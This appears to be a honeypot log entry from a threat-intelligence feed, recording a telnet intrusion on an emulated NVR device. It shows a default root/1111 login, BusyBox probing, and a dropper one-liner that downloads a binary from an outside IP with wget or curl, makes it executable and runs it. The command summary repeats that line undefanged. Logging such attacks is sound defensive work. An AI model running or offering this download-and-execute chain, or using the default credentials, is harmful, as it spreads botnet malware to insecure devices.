Attack #291660 telnet
Source: 94.243.13.19
Target port: 23
Authenticated: yes
Commands: 11
Duration: 4.1s
Session recording
Transcript
Welcome to HiLinux (NVR Box)
hilinux-nvrbox login: root
Password: 1111

BusyBox v1.20.2 (2015-04-01 10:23:44 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

hilinux-nvrbox# start
sh: start: not found
hilinux-nvrbox# enable
sh: enable: not found
hilinux-nvrbox# config terminal
sh: config: not found
hilinux-nvrbox# system
sh: system: not found
hilinux-nvrbox# linuxshell
sh: linuxshell: not found
hilinux-nvrbox# su
sh: su: not found
hilinux-nvrbox# shell
sh: shell: not found
hilinux-nvrbox# sh
hilinux-nvrbox# >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x4c\x4f\x4e\x4f\x4b\x4e'
sh: can't create /usr/.x: nonexistent directory
LONOKN
hilinux-nvrbox# /bin/busybox wget;/bin/busybox echo -ne '\x4c\x4f\x4e\x4f\x4b\x4e'
BusyBox v1.20.2 (2015-04-01 10:23:44 CST) multi-call binary.

Usage: wget [-cq] [-O FILE] [--header 'HEADER: VALUE'] URL

LONOKNhilinux-nvrbox# >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget hxxp://78[.]29[.]39[.]213:37497/i ||curl -O hxxp://78[.]29[.]39[.]213:37497/i ||/bin/busybox wget hxxp://78[.]29[.]39[.]213:37497/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x4f\x57\x46\x42\x47\x4c\x4a\x49'
sh: can't create /usr/.x: nonexistent directory
Connecting to 78.29.39.213:37497 (78.29.39.213:37497)
saving to 'i'
i                    100% |*******************************|  1234k  0:00:01 ETA
'i' saved
sh: ./i: not found
OWFBGLJI
hilinux-nvrbox#
Credentials
Username: root
Password: 1111
Geolocation hub-resolved
🇷🇺Russia · Tyumen Oblast · Tyumen
Behavioral classification
🦠
Matched signals:
- wget/curl download
- chmod/exec chain
- BusyBox probing
Command summary
start
enable
config terminal
system
linuxshell
su
shell
sh
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x4c\x4f\x4e\x4f\x4b\x4e'
/bin/busybox wget;/bin/busybox echo -ne '\x4c\x4f\x4e\x4f\x4b\x4e'
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://78.29.39.213:37497/i ||curl -O http://78.29.39.213:37497/i ||/bin/busybox wget http://78.29.39.213:37497/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x4f\x57\x46\x42\x47\x4c\x4a\x49'
Reported to threat intel
AlienVault OTX ✓
HoneyMire Hub · open feed: / · API: /api · docs: /docs · blocklists: /blocklists · about: /about · firmware: github.com/HoneyMire/HoneyMire